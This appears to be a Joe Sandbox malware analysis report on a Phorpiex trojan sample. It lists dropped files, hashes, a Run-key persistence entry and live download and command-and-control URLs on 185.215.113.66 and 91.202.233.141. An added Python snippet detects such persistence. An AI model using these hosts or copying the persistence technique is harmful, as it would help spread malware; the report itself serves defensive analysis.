C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe | 82% | ReversingLabs | Win32.Trojan.MintZard |
C:\Users\user\AppData\Local\Temp\33080.scr | 82% | ReversingLabs | Win32.Trojan.MintZard |
C:\Users\user\AppData\Local\Temp\818921588.exe | 82% | ReversingLabs | Win32.Trojan.MintZard |
C:\Windows\sysppvrdnvs.exe | 82% | ReversingLabs | Win32.Trojan.MintZard |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.66/tdrpl.exe | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/soap/encoding/ | 818921588.exe.2.dr | false | URL Reputation: safe | unknown
http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s | 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.dr | false | | unknown
http://91.202.233.141/dwntblan | sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/tdrpl.exeb1E | Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://91.202.233.141/ | 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.dr | true | | unknown
http://185.215.113.66/1JJC: | sysppvrdnvs.exe, 00000002.00000003.1936945817.00000000006BA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/soap/envelope/ | 818921588.exe.2.dr | false | URL Reputation: safe | unknown
http://185.215.113.66/1G0td | sysppvrdnvs.exe, 00000002.00000003.1903094197.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/2 | sysppvrdnvs.exe, 00000002.00000002.2003916309.0000000002EEC000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
http://91.202.233.141/dwntblt-InLMEMH | sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/1C: | sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/1LMEM0P | sysppvrdnvs.exe, 00000002.00000002.2003480961.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/2C: | sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/1 | sysppvrdnvs.exe, 00000002.00000003.1903798515.0000000000688000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/1aenh.dll | sysppvrdnvs.exe, 00000002.00000003.1937078841.0000000000699000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c | 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.dr | false | | unknown
                                                              unknown
                                                              http://91.202.233.141/dwntbl2Csysppvrdnvs.exe, 00000002.00000002.2003480961.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://91.202.233.141/dwntblhysysppvrdnvs.exe, 00000002.00000002.2003480961.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://185.215.113.66/Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmp, Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.drtrue
                                                                    unknown
                                                                    http://91.202.233.141/dwntbllvCkdsysppvrdnvs.exe, 00000002.00000002.2003480961.000000000061E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://91.202.233.141/dwntblsysppvrdnvs.exe, 00000002.00000003.1937078841.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000002.2004958997.0000000005B0D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://185.215.113.66/tdrp.exesysppvrdnvs.exefalse
                                                                          unknown
                                                                          http://185.215.113.66/tdrpl.exek1LBjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://185.215.113.66/2(Bfsysppvrdnvs.exe, 00000002.00000002.2003916309.0000000002EEC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://185.215.113.66/1uKsysppvrdnvs.exe, 00000002.00000002.2003480961.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1937078841.000000000069F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://185.215.113.66/tdrpl.exerBjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://185.215.113.66/2JJC:sysppvrdnvs.exe, 00000002.00000002.2003480961.00000000006BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.66 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
2.186.114.89 | unknown | Iran (Islamic Republic of) | 58224 | TCIIR | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
5.75.95.114 | unknown | Iran (Islamic Republic of) | 58224 | TCIIR | true
2.63.29.22 | unknown | Russian Federation | 12389 | ROSTELECOM-ASRU | false
91.202.233.141 | unknown | Russian Federation | 9009 | M247GB | true
5.239.153.192 | unknown | Iran (Islamic Republic of) | 58224 | TCIIR | true
Note: 239.255.255.250 is the SSDP multicast address used by Windows for local UPnP discovery; it is host background traffic, not infrastructure of this sample.
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543742
Start date and time: 2024-10-28 11:10:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Bjl3geiFEK.exe (renamed because the original name is a hash value)
Original Sample Name: ed9fbbbe548c41479cb70e4d694793d0.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@27/15@0/7
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 63
                                                                                    • Number of non-executed functions: 146
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 20.109.209.108, 4.175.87.197, 20.3.187.198, 52.165.164.15, 20.242.39.171, 40.69.42.241
                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, redir.update.msft.com.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, www.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: Bjl3geiFEK.exe
Time | Type | Description
06:11:17 | API Interceptor | 3x Sleep call for process: sysppvrdnvs.exe modified
06:11:17 | API Interceptor | 17x Sleep call for process: powershell.exe modified
10:11:18 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value name "Windows Settings", data C:\Windows\sysppvrdnvs.exe
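The Autostart row is the persistence artifact worth hunting for: a Run value named "Windows Settings" whose data is C:\Windows\sysppvrdnvs.exe, a PE dropped directly into the root of the Windows directory rather than into System32 or a vendor folder. The following Python is an added example, not part of the report: it scans Sysmon-style Event ID 13 (registry value set) records for Run/RunOnce values whose target binary, or whose writing process, lives directly in %SystemRoot%. The event records are constructed for the example (the first mirrors the artifact above; the report does not say which process wrote the key, so the Image field there is an assumption), %SystemRoot% is assumed to be C:\Windows, and the field names follow Sysmon's Image/TargetObject/Details.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style Event ID 13 records (RegistryEvent, value set). Not events
# from the sandbox run; only the first record's TargetObject and Details mirror the
# report's timeline entry, and its Image is an assumption.
EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\sysppvrdnvs.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings",
     "Details": r"C:\Windows\sysppvrdnvs.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\system32\SecurityHealthSystray.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\ExampleApp\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-1\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExampleApp",
     "Details": r'"C:\Program Files\ExampleApp\app.exe" --tray'},
    # Key creation (Event ID 12) carries no value data and is ignored.
    {"EventID": 12, "Image": r"C:\Windows\sysppvrdnvs.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "Details": ""},
]

# Value written under a Run or RunOnce key; group 2 is the value name.
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\([^\\]+)$", re.IGNORECASE)
# First executable path in the value data, with or without surrounding quotes.
EXE_PATH = re.compile(r'^"?([A-Za-z]:\\[^"]*?\.exe)', re.IGNORECASE)
SYSTEM_ROOT = PureWindowsPath(r"C:\Windows")  # assumption: default %SystemRoot%


def in_system_root(path: str) -> bool:
    """True when the file sits directly in C:\\Windows, not in a subdirectory."""
    parent = PureWindowsPath(path).parent
    return str(parent).lower() == str(SYSTEM_ROOT).lower()


def find_suspicious_run_values(events):
    """Return Run/RunOnce value writes whose target or writer lives in %SystemRoot%."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        key = RUN_KEY.search(ev["TargetObject"])
        if not key:
            continue
        exe = EXE_PATH.match(ev["Details"])
        if not exe:
            continue
        target = exe.group(1)
        reasons = []
        if in_system_root(target):
            reasons.append("autostart target lives directly in %SystemRoot%")
        if in_system_root(ev["Image"]):
            reasons.append("value written by a process running from %SystemRoot%")
        if reasons:
            hits.append({"value_name": key.group(2), "target": target,
                         "writer": ev["Image"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_run_values(EVENTS):
        print(f'{hit["value_name"]!r} -> {hit["target"]} (written by {hit["writer"]})')
        for reason in hit["reasons"]:
            print("   ", reason)
```

On the constructed records only the "Windows Settings" value is reported, on both counts; the SecurityHealth value in System32 and the user-level ExampleApp value pass, which is the point of keying on the directory rather than on the value name, since the name is chosen by the attacker to look like a Windows component.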
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.66 | T52Z708x2p.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/1
185.215.113.66 | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/2
185.215.113.66 | Us051y7j25.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | thcdVit1dX.exe | malicious | Phorpiex | 185.215.113.66/3
185.215.113.66 | bBcZoComLl.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/4
185.215.113.66 | file.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | GGXhCiYFBw.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | 0NSjUT34gS.exe | malicious | Phorpiex, Xmrig | 185.215.113.66/5
185.215.113.66 | file.exe | malicious | Phorpiex | 185.215.113.66/3
2.186.114.89 | SecuriteInfo.com.Trojan.DownLoader46.2135.7325.13890.exe | malicious | Phorpiex, Xmrig | -
239.255.255.250 | https://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.com | malicious | HTMLPhisher | -
239.255.255.250 | https://startuppro.wethemez.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVVXdzRVWEk9JnVpZD1VU0VSMjExMDIwMjRVNTIxMDIxNTI=N0123 | malicious | HTMLPhisher, Mamba2FA | -
239.255.255.250 | Sars Urgent Notice.pdf | malicious | Unknown | -
239.255.255.250 | file.exe | malicious | Stealc, Vidar | -
239.255.255.250 | https://alinefrasca.sbs/pktcr/ | malicious | HTMLPhisher | -
239.255.255.250 | https://kljhgfdertg7h8uihfgdew34e5rtyuhjiolkjhgfd.pages.dev/?zOTAyMn0.o1hC1xYbJolS=test@kghm.com&h0-bOY230w22zEQSk5Ti | malicious | HTMLPhisher | -
239.255.255.250 | https://bitly.cx/NXacY | malicious | GRQ Scam | -
239.255.255.250 | file.exe | malicious | Stealc, Vidar | -
239.255.255.250 | http://browserupdater.com | malicious | Unknown | -
239.255.255.250 | http://ddl.safone.dev | malicious | Unknown | -
91.202.233.141 | T52Z708x2p.exe | malicious | Phorpiex, Xmrig | 91.202.233.141/5
91.202.233.141 | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig | 91.202.233.141/5
91.202.233.141 | Us051y7j25.exe | malicious | Phorpiex, Xmrig | 91.202.233.141/1
91.202.233.141 | thcdVit1dX.exe | malicious | Phorpiex | 91.202.233.141/dwntbl
91.202.233.141 | bBcZoComLl.exe | malicious | Phorpiex, Xmrig | 91.202.233.141/5
91.202.233.141 | file.exe | malicious | Phorpiex, Xmrig | 91.202.233.141/4
91.202.233.141 | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig | 91.202.233.141/2
91.202.233.141 | GGXhCiYFBw.exe | malicious | Phorpiex, Xmrig | 91.202.233.141/4
91.202.233.141 | 0NSjUT34gS.exe | malicious | Phorpiex, Xmrig | 91.202.233.141/1
91.202.233.141 | file.exe | malicious | Phorpiex | 91.202.233.141/5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | Sars Urgent Notice.pdf | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://ddl.safone.dev | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | 199.232.210.172
bg.microsoft.map.fastly.net | SecuriteInfo.com.Trojan.PWS.Stealer.38079.9664.9958.exe | malicious | Mystic Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | v9dVG4fAGa.exe | malicious | Clipboard Hijacker | 199.232.214.172
bg.microsoft.map.fastly.net | 3cfc9c.msi | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | lBYtUYrlFO.exe | malicious | Stealc | 199.232.214.172
bg.microsoft.map.fastly.net | j6qRCRPE7S.ps1 | malicious | Metasploit | 199.232.210.172
bg.microsoft.map.fastly.net | 2OwohMu0zx.exe | malicious | AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | UwOcZADSmi.exe | malicious | AsyncRAT | 199.232.214.172
Note: bg.microsoft.map.fastly.net is a Microsoft CDN hostname contacted by Windows itself; these matches reflect shared background traffic, not a link between the samples.
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
TCIIR | la.bot.m68k.elf | malicious | Unknown | 217.219.51.62
TCIIR | nklarm5.elf | malicious | Unknown | 151.234.55.232
TCIIR | jklmpsl.elf | malicious | Unknown | 217.219.63.32
TCIIR | nklx86.elf | malicious | Unknown | 151.234.90.56
TCIIR | la.bot.sh4.elf | malicious | Unknown | 195.181.57.222
TCIIR | sh4.elf | malicious | Mirai, Moobot | 37.254.3.194
TCIIR | nabppc.elf | malicious | Unknown | 37.148.66.98
TCIIR | splarm7.elf | malicious | Unknown | 5.233.188.249
TCIIR | nabarm5.elf | malicious | Unknown | 2.181.175.92
TCIIR | la.bot.sparc.elf | malicious | Unknown | 91.147.73.3
                                                                                                          TCIIRla.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 217.219.51.62
                                                                                                          nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 151.234.55.232
                                                                                                          jklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 217.219.63.32
                                                                                                          nklx86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 151.234.90.56
                                                                                                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 195.181.57.222
                                                                                                          sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 37.254.3.194
                                                                                                          nabppc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 37.148.66.98
                                                                                                          splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 5.233.188.249
                                                                                                          nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 2.181.175.92
                                                                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 91.147.73.3
                                                                                                          ROSTELECOM-ASRUla.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 109.161.76.251
                                                                                                          la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 37.21.81.251
                                                                                                          la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 217.107.169.246
                                                                                                          nklm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 178.234.186.81
                                                                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 95.167.9.144
                                                                                                          splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 95.37.181.16
                                                                                                          splppc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 95.191.240.170
                                                                                                          nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 188.16.234.28
                                                                                                          nabarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 95.159.138.237
                                                                                                          splarm.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 178.67.175.45
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\33080.scr | T52Z708x2p.exe | malicious | Phorpiex, Xmrig
                                           | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig
                                           | Us051y7j25.exe | malicious | Phorpiex, Xmrig
                                           | thcdVit1dX.exe | malicious | Phorpiex
                                           | file.exe | malicious | Phorpiex, Xmrig
                                           | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe | T52Z708x2p.exe | malicious | Phorpiex, Xmrig
                                                                                 | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig
                                                                                 | Us051y7j25.exe | malicious | Phorpiex, Xmrig
                                                                                 | thcdVit1dX.exe | malicious | Phorpiex
                                                                                 | file.exe | malicious | Phorpiex, Xmrig
                                                                                 | dgiX55cHyU.exe | malicious | Phorpiex, Xmrig
                                                                                                                                  Process:C:\Users\user\Desktop\Bjl3geiFEK.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):85504
                                                                                                                                  Entropy (8bit):6.394560338648692
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                  MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                  SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                  SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                  SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                   Joe Sandbox View:
                                                                                                                                   • Filename: T52Z708x2p.exe, Detection: malicious
                                                                                                                                   • Filename: lJ4EzPSKMj.exe, Detection: malicious
                                                                                                                                   • Filename: Us051y7j25.exe, Detection: malicious
                                                                                                                                   • Filename: thcdVit1dX.exe, Detection: malicious
                                                                                                                                   • Filename: file.exe, Detection: malicious
                                                                                                                                   • Filename: dgiX55cHyU.exe, Detection: malicious
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):110600
                                                                                                                                  Entropy (8bit):7.998486619051527
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                  MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                  SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                  SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                  SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                  Malicious:false
